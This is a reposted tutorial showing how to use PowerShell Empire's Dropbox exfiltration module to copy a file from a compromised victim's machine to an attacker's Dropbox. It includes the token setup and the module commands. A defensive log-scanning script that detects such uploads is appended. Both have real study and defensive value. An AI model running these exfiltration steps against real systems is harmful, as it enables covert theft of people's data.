Data Exfiltration using PowerShell Empire

Tommy Angelo

New member
25 Apr 2020
What is Data Exfiltration

Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.



Methods of Data Exfiltration

Open Methods:

  • HTTP/HTTPS Downloads & Uploads
  • FTP
  • Email
  • Instant Messaging
  • P2P filesharing

Concealed Methods:

  • SSH
  • VPN
  • Protocol Tunneling
  • Cloud Storage Uploads
  • Steganography
  • Timing channel

(From Wikipedia)

Generate Token Via Dropbox API

The Empire module used for this requires a Dropbox API access token. To get one, first create an account on Dropbox. After creating the account, head to the developer tools page. A webpage will open similar to the one shown below. Here we select “Dropbox API”. In the type of access section, we choose “App folder”. Name the app as you like, then click the Create App button to proceed.

1.jpg


This leads to another webpage, as shown below. Here, move on to the OAuth 2 section and generate an access token. This gives the Dropbox API token required for this practical; now copy the generated token.

2.jpg


Data Exfiltration

Now we are going to use PowerShell Empire for exfiltration, assuming we have already compromised the victim machine and are about to complete our mission by copying data from the victim without his knowledge.

As you can observe, we have an Empire agent, which means I have already spawned a shell on the victim’s machine. Empire has a post-exploitation module for data exfiltration, in which we will use the above token.

Code:
usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\Users\raj\Desktop\notes.txt
set TargetFilePath /Apps/notes.txt
set ApiKey <API Token>
execute

3.png


As you can observe, I have notes.txt inside /my files, which means we have successfully transferred the data from a source ******** to destination.

4.jpg


Thus, in this way, we have successfully transferred the data from the victim’s machine to our Dropbox; hence this technique is known as Dropbox exfiltration.





Source: https://www.hackingarticles.in/data-exfiltration-using-powershell-empire/
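A defender-side check for the transfer described above, as an added example that is not part of the original post or of Empire: it scans web-proxy log lines for uploads to the Dropbox API v2 content endpoint made by anything other than a sanctioned sync client, and totals the bytes sent per workstation. It assumes the module's upload reaches Dropbox through that HTTP API endpoint; the log layout, host names and sanctioned user-agent prefix are assumptions, and the sample lines are constructed.

```python
import csv
import io
from collections import defaultdict

# Dropbox API v2 content host and upload paths.
UPLOAD_HOST = "content.dropboxapi.com"
UPLOAD_PATHS = ("/2/files/upload", "/2/files/upload_session/")
# Assumption: user-agent prefix of the sync client approved in this environment.
SANCTIONED_AGENTS = ("DropboxDesktopClient/",)

# Constructed sample. Fields: time, src_host, user_agent, method, dest_host, path, bytes_out
SAMPLE_LOG = """\
2020-04-25T10:01:02Z,WS-014,DropboxDesktopClient/95.4.441,POST,content.dropboxapi.com,/2/files/upload,52311
2020-04-25T10:03:40Z,WS-022,Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1,POST,content.dropboxapi.com,/2/files/upload,1840
2020-04-25T10:03:55Z,WS-022,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/81.0,GET,www.dropbox.com,/home,0
2020-04-25T10:05:10Z,WS-031,python-requests/2.23.0,POST,content.dropboxapi.com,/2/files/upload_session/append_v2,4194304
2020-04-25T10:06:00Z,WS-031,python-requests/2.23.0,POST,api.dropboxapi.com,/2/files/list_folder,210
this line is malformed and must be skipped
"""


def is_api_upload(method, host, path):
    """True for a POST to a Dropbox API upload path (not web UI or metadata calls)."""
    return (method == "POST" and host.lower() == UPLOAD_HOST
            and path.startswith(UPLOAD_PATHS))


def find_unsanctioned_uploads(log_text):
    """Return {src_host: {"bytes": total, "agents": set}} for API uploads
    whose user agent is not a sanctioned client."""
    hits = defaultdict(lambda: {"bytes": 0, "agents": set()})
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 7 or not row[6].isdigit():
            continue  # skip malformed lines instead of aborting the scan
        _, src, agent, method, host, path, sent = row
        if not is_api_upload(method, host, path):
            continue
        if agent.startswith(SANCTIONED_AGENTS):
            continue
        hits[src]["bytes"] += int(sent)
        hits[src]["agents"].add(agent)
    return dict(hits)


if __name__ == "__main__":
    for src, info in sorted(find_unsanctioned_uploads(SAMPLE_LOG).items()):
        print(src, info["bytes"], sorted(info["agents"]))
```

The user agent is chosen by the sender, so treat a match as a lead to correlate with endpoint process and PowerShell script-block logs, not as proof on its own.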
 